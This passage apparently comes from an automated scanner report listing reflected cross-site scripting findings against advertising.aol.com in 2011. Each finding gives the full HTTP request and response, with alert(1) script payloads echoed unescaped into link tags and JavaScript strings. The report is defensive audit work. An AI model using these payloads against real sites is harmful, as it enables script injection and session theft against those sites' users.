User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.networkadvertising.org/managing/opt_out.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:52:12 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=11e146cbc5d0a96083ff4e7f81be0db3; expires=Tue, 06 Dec 2011 22:25:32 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:52:12 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/naieab28"><script>alert(1)</script>f1f72490cae/nai.php?action_id=3" />
...[SNIP]...

2.21. http://advertising.aol.com/nai/nai.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bdb74"-alert(1)-"3f84ece3698 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nai/nai.phpbdb74"-alert(1)-"3f84ece3698?action_id=3 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.networkadvertising.org/managing/opt_out.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:52:26 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=70c35058c7508c475a031622532905d1; expires=Tue, 06 Dec 2011 22:25:46 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:52:26 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
i('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/nai/nai.phpbdb74"-alert(1)-"3f84ece3698?action_id=3";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advertisin
...[SNIP]...

2.22. http://advertising.aol.com/nai/nai.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d841"><script>alert(1)</script>f3957393be was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /nai/nai.php4d841"><script>alert(1)</script>f3957393be?action_id=3 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.networkadvertising.org/managing/opt_out.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:52:22 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=4af56b244f286e9d08f19cd078651836; expires=Tue, 06 Dec 2011 22:25:42 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:52:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11485

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/nai/nai.php4d841"><script>alert(1)</script>f3957393be?action_id=3" />
...[SNIP]...

2.23. http://advertising.aol.com/token/0/3/1499749799/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/0/3/1499749799/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90e0a"><script>alert(1)</script>245acdf034e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /90e0a"><script>alert(1)</script>245acdf034e/0/3/1499749799/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:52:43 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=54bea375889e73a3b01a81099d3447a2; expires=Tue, 06 Dec 2011 22:26:03 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:52:43 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/90e0a"><script>alert(1)</script>245acdf034e/0/3/1499749799/" />
...[SNIP]...

2.24. http://advertising.aol.com/token/0/3/1499749799/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/0/3/1499749799/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 38992"-alert(1)-"38f6cde996b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /38992"-alert(1)-"38f6cde996b/0/3/1499749799/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:52:49 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=a18e8bae8249b6568798778cf7075a34; expires=Tue, 06 Dec 2011 22:26:09 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:52:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/38992"-alert(1)-"38f6cde996b/0/3/1499749799/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

2.25. http://advertising.aol.com/token/0/3/1709369489/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/0/3/1709369489/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9101d"-alert(1)-"cdb432a9985 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /9101d"-alert(1)-"cdb432a9985/0/3/1709369489/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:55:47 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=77f8bc1b3de36671663d1c0c3e31b4bf; expires=Tue, 06 Dec 2011 22:29:07 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:55:47 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/9101d"-alert(1)-"cdb432a9985/0/3/1709369489/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

2.26. http://advertising.aol.com/token/0/3/1709369489/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/0/3/1709369489/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcff1"><script>alert(1)</script>b05cc5dcc3c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /fcff1"><script>alert(1)</script>b05cc5dcc3c/0/3/1709369489/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:55:39 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=7219d18a0f504f6bc9ded1719bf37665; expires=Tue, 06 Dec 2011 22:28:59 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:55:39 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/fcff1"><script>alert(1)</script>b05cc5dcc3c/0/3/1709369489/" />
...[SNIP]...

2.27. http://advertising.aol.com/token/1/3/1119994994/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/1/3/1119994994/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e92b"-alert(1)-"e06aef38ad8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /6e92b"-alert(1)-"e06aef38ad8/1/3/1119994994/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:55:44 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=5afbfb065ca627dbc742f048a95ee66d; expires=Tue, 06 Dec 2011 22:29:04 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:55:44 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/6e92b"-alert(1)-"e06aef38ad8/1/3/1119994994/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,advert
...[SNIP]...

2.28. http://advertising.aol.com/token/1/3/1119994994/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/1/3/1119994994/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eeeb2"><script>alert(1)</script>5a3eb0c5942 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /eeeb2"><script>alert(1)</script>5a3eb0c5942/1/3/1119994994/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:55:37 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=6e498656466de10a759b918811dd234d; expires=Tue, 06 Dec 2011 22:28:57 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:55:37 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/eeeb2"><script>alert(1)</script>5a3eb0c5942/1/3/1119994994/" />
...[SNIP]...

2.29. http://advertising.aol.com/token/1/3/174796341/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/1/3/174796341/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b042"-alert(1)-"1647ec6fff7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /4b042"-alert(1)-"1647ec6fff7/1/3/174796341/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:52:49 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=9e9ca65f8a21c943cd987506a50d86d3; expires=Tue, 06 Dec 2011 22:26:09 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:52:49 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
r s_265=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/4b042"-alert(1)-"1647ec6fff7/1/3/174796341/";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascript:,adverti
...[SNIP]...

2.30. http://advertising.aol.com/token/1/3/174796341/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/1/3/174796341/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ccca"><script>alert(1)</script>0c2e654eb9d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1ccca"><script>alert(1)</script>0c2e654eb9d/1/3/174796341/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:52:43 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=48b509f431380c55594336267736a6ee; expires=Tue, 06 Dec 2011 22:26:03 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:52:43 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11457

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/1ccca"><script>alert(1)</script>0c2e654eb9d/1/3/174796341/" />
...[SNIP]...

2.31. http://advertising.aol.com/token/2/2/687446498/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/2/2/687446498/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8215"><script>alert(1)</script>11a8c3d7f98 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /d8215"><script>alert(1)</script>11a8c3d7f98/2/2/687446498/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.2 (KHTML, like Gecko) Chrome/15.0.874.120 Safari/535.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|275D437C851D1240-6000012F0043341A[CE]

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Nov 2011 18:52:53 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Set-Cookie: SESSff329d810a46b3a1bf645141daed34cf=7f7123f3b14ac8aaf436af6aa31124f1; expires=Tue, 06 Dec 2011 22:26:13 GMT; path=/; domain=.advertising.aol.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2011 18:52:53 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 11457

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://advertising.aol.com/d8215"><script>alert(1)</script>11a8c3d7f98/2/2/687446498/" />
...[SNIP]...

2.32. http://advertising.aol.com/token/2/2/687446498/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/2/2/687446498/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfb4c"-alert(1)-"0b0fe7bc023 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

